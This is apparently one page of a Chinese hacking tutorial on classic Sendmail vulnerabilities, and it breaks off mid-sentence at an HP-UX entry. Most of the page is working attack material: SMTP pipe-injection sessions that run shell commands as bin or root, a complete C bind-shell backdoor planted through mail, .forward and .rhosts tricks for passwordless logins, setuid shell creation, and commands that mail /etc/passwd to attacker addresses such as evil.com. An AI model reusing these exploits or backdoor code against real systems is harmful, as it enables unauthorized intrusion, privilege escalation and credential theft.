|
--[ 1.4.3 sendmial
Sendmail 是在Unix环境下使用最广泛的实现邮件发送/接受的邮件传输代理(mail transfer agent简称MTA)程序。他可以扩展又可以高度配置,及其复杂。Semdmail在Internet上的广泛应用使它成为攻击者的主要目标。过去的几年里发现了若干个缺陷。事实上,第一个建议是CERT/CC 在1988年提出的,指出了Sendmail中一个易受攻击的脆弱性。其中许多脆弱点和远程缓冲区溢出条件相关,输入验证攻击也有发现。曾经流行的 Sendmail 管道攻击,通过把一个管道字符插入到一个e-mail的特定字段,sendmail可以被迫执行命令。这种行为可以导致远程攻击者用root权限执行命令。下面是为发掘该脆弱点而交互输入的命令:
helo
mail from: |
rcpt to: bounce
data
.
mail from: bin
rcpt to: | sed '1,/^$/d' | sh
data
具体可以这样:通过这个漏洞可以是远程用户获得bin权限,其实也就等于是root权限了;-)
先telnet到目标主机的25端口,然后按照如下输入:
helo
mail from: |
rcpt to: bounce
data
.
mail from: bin
rcpt to: | sed '1,/^$/d' | sh
data
cat > /tmp/a.c <<EOF
#define PORT 1234
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;
int main (int argc, char *argv[])
{
int i;
for(i=0;i<argc;i++){
memset(argv[i],'',strlen(argv[i]));
};
strcpy(argv[0],"th1s iz mY 3l1t3 baCkd00r");
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (soc_des == -1)
exit(-1);
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
serv_addr.sin_port = htons(PORT);
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
if (soc_rc != 0)
exit(-1);
if (fork() != 0)
exit(0);
setpgrp();
signal(SIGHUP, SIG_IGN);
if (fork() != 0)
exit(0);
soc_rc = listen(soc_des, 5);
if (soc_rc != 0)
exit(0);
while (1){
soc_len = sizeof(client_addr);
soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
if (soc_cli < 0)
exit(0);
cli_pid = getpid();
server_pid = fork();
if (server_pid != 0){
dup2(soc_cli,0);
dup2(soc_cli,1);
dup2(soc_cli,2);
execl("/bin/sh","sh",(char *)0);
close(soc_cli);
exit(0);
}
close(soc_cli);
}
}
EOF
gcc -o /tmp/a /tmp/a.c
/tmp/a
.
quit
然后telnet到目标主机的1234端口上,就可以获得bin用户的shell了!
除常见的缓冲区溢出和输入验证攻击外发掘sendmail在功能上的漏洞以获取特权访问能力也是有可能的。其中常用的一个是通过ftp或NFS创建或修改某个用户的~/.forward文件。下面看一个例子:
[vitter]$ cat > .forward
|"cp /bin/sh /home/gk/evil_shell ; chmod 755 /home/gk/evil_shell"
<crtl> D
[vitter]$ cat .forward
|"cp /bin/sh /home/gk/evil_shell ; chmod 755 /home/gk/evil_shell"
创建这个文件后,攻击者把它传到目标系统,攻击者就可以给这个受害帐号发送邮件了,执行该文件派生出一个shell,其特权就是受害用户的特权。
再举几例:
# telnet victim.com 25
Trying xxx.xxx.xxx.xxx...
Connected to victim.com
Escape character is '^]'.
220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
mail from: "|echo + >> /home/zen/.rhosts"
250 "|echo + >> /home/zen/.rhosts"... Sender ok
rcpt to: nosuchuser
550 nosuchuser... User unknown
data
354 Enter mail, end with "." on a line by itself
..
250 Mail accepted
quit
Connection closed by foreign host.
# rsh victim.com -l zen csh -i
Welcome to victim.com!
$
WIZ = *古老* =
sendmail 中最古老、最容易被利用的就是wiz后门,但是现在已经很难找到了。利用方法是:当连接后只需要输入“wiz”,然后紧接着输入“SHELL”就可以得到一个rootshell了。[这个后门可以通过配置sendmail.cf文件来设置……紧接着加密口令的“OW”选项。]
DEBUG = *古老* =
这个漏洞曾经被Robert . Morris的网络蠕虫利用过,它可以使得攻击者在远程机器上执行任意程序,它只需要简单的给出debug命令,使用一个通向/bin/sh的管道,然后把你想要执行的命令添入数据中。下面是攻击实例:
[如果sendmail服务器对于debug命令回答“200 Debug set”,则这个漏洞存在,并且可以利用]
例子:
#!/bin/sh
telnet << EOF
open fucked.host.edu 25
debug
mail from: </dev/null>
rcpt to: <"|sed -e '1,/^$/'d | /bin/sh ; exit 0">
data
cp /bin/sh /tmp/sushi # 或者其它命令,如:
chmod 4755 /tmp/sushi # echo "+ +" >> /.rhosts
.
EOF
TURN = *古老* =
TURN命令可以偷别人的信……[别操心了,太老了!]
输入缓冲区溢出 = *古老* =
能够锁住sendmail服务器……[老漏洞,只是为了完整才收集到这篇文章里]
DECODE别名 = *VrFy* =
如果“/etc/aliases”文件中包含“|/usr/bin/uudecode”,那么任何人都可以给decode写信,以sendmail服务器的身份写任何文件。如果还能够连接到sendmail服务器的话,还可以以任意用户的身份写任意文件。可以通过下面的方法测试decode别名是否存在:
% telnet target.com
Trying 127.127.127.127
Connected to target.com
Escape character is '^]'.
220 target.com Sendmail Sendmail 5.55/victim ready at Fri,6 Nov 93 18:00 PDT
expn decode
250 <"|/usr/bin/uudecode">
quit
这证明decode别名存在,下面就利用它:
% echo "myhost.com" | uuencode /usr/bin/.rhosts | mail decode@target.com
接下来:
% cat > outfile # 制作我们的.rhosts文件
+ +
^C
% uuencode outfile /usr/bin/.rhosts
begin 644 /bin/.rhosts
$*R'K"O # 这就是uuencoded过的“+ +”字符
% telnet fuqdhost.com 25
220 fuqdhost.com SunOS Sendmail 8.6.1 #5 ready at Fri, 13 May 99 00:00 (EST)
VRFY decode
250 <|/usr/bin/uudecode>
MAIL FROM: bin
250 ... Sender Okay
RCPT TO: decode
250 ... Recipient Okay
DATA
354 Enter mail, end with "." on a line by itself
begin 644 /bin/.rhosts
$*R'K"O
end
.
250 Mail accepted
quit
221 fuqdhost.com closing connection
Connection closed by foreign host.
然后就可以不用口令验证而直接rlogin过去了!
% rlogin fuqdhost.com -l bin
$
如果没有可写的主目录,还可以通过制造一个伪造的/etc/aliases.pag文件,让它包含一个你想要在远程主机上执行的命令的别名。因为许多系统上的用来控制系统邮件别名aliases.pagaliases.dir文件是全局可写的,所以才可以使用这种方法。
evil % cat decode
bin: "| cat /etc/passwd | mail zen@evil.com"
evil % newaliases -oQ/tmp -oA`pwd`/decode
evil % uuencode decode.pag /etc/aliases.pag | mail decode@victim.com
evil % /usr/lib/sendmail -fbin -om -oi bin@victim.com < /dev/null
OVERWRITE FILES = 5.59中修复 =
远程用户可以写系统上任何非root拥有的文件,这个漏洞在Berkeley 5.5.9版中被修复了。所以以下说明只能用于5.59版以前的sendmail,假设我们在evil.com上进行攻击,那么:
% cat evil_sendmail
telnet victim.com 25 << EOSM
rcpt to: /home/zen/.rhosts
mail from: zen
data
random garbage
.
rcpt to: /home/zen/.rhosts
mail from: zen
data
evil.com
.
quit
EOSM
evil % /bin/sh evil_sendmail
Trying 128.128.128.1
Connected to victim.com
Escape character is '^]'.
Connection closed by foreign host.
evil % rlogin victim.com -l zen
Welcome to victim.com!
victim %
'|PROGRAM ' = 5.55上测试通过 = ...其它版也可能存在此漏洞
任何人可以通过在发送人地址中设置路径来远程执行任意shell命令,一个典型的得到
passwd文件的攻击如下:
% telnet target.com 25
Trying 123.456.789.0...
Connected to target.com
Escape character is '^]'.
220 target.com Sendmail 5.55 ready at Mon, 12 Dec 93 23:51
mail from: "|/bin/mail me@myhost.com < /etc/passwd"
250 "|/bin/mail me@myhost.com < /etc/passwd"... Sender ok
rcpt to: mickeymouse
550 mickeymouse... User unknown
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit
Connection closed by foreign host.
%
通过tail得到一个shell = 5.65 =
通过tail命令加上一个管道符可以获得一个运行sendmail daemon身份的shell
(一般是root),具体如下:
% telnet panix.com 25
Trying 198.7.0.2 ...
Connected to panix.com.
Escape character is '^]'.
220 panix.com 5.65c/IDA-1.4.4 Sendmail is ready at Mon, 8 Nov 1993 19:41:13
-0500
HELO
250 Hello panix.com, why do you call yourself ?
MAIL FROM: |/usr/ucb/tail|/usr/bin/sh
250 |/usr/ucb/tail|/usr/bin/sh... Sender ok
RCPT TO: root
250 root... Recipient ok
DATA
354 Enter mail, end with @.@ on a line by itself
From: jhawk"panix.com (John Hawkinson)
To: jhawk"panix.com (John Hawkinson)
Return-Receipt-To: |foobar
Subject: This is a large hole in the ground.
X-Disclaimer: We take no responsibility for what might happen
Hi there. Wanna play ball?
#!/bin/sh
#The above line is just in case :-)
echo This is a Serious Bug > /tmp/bug
echo id reports: >> /tmp/bug
/usr/bin/id >> /tmp/bug
echo Fixing this would be good >> /tmp/bug
cp /bin/sh /tmp/bugshell
chmod u+s /tmp/bugshell
echo /tmp/bugshell contains a setuid daemon shell >> /tmp/bug
chmod ugo+rx /tmp/bugshell
.
250 Ok
quit
221 panix.com closing connection
HP-UX = HP-UX 9.x =
在HP-UX 9.x中的sendmail有个漏洞,是攻击者可以在目标系统上创造任意文件,
共6页: 上一页 1 [2] [3] [4] [5] [6] 下一页
|
推荐
评论(0条)
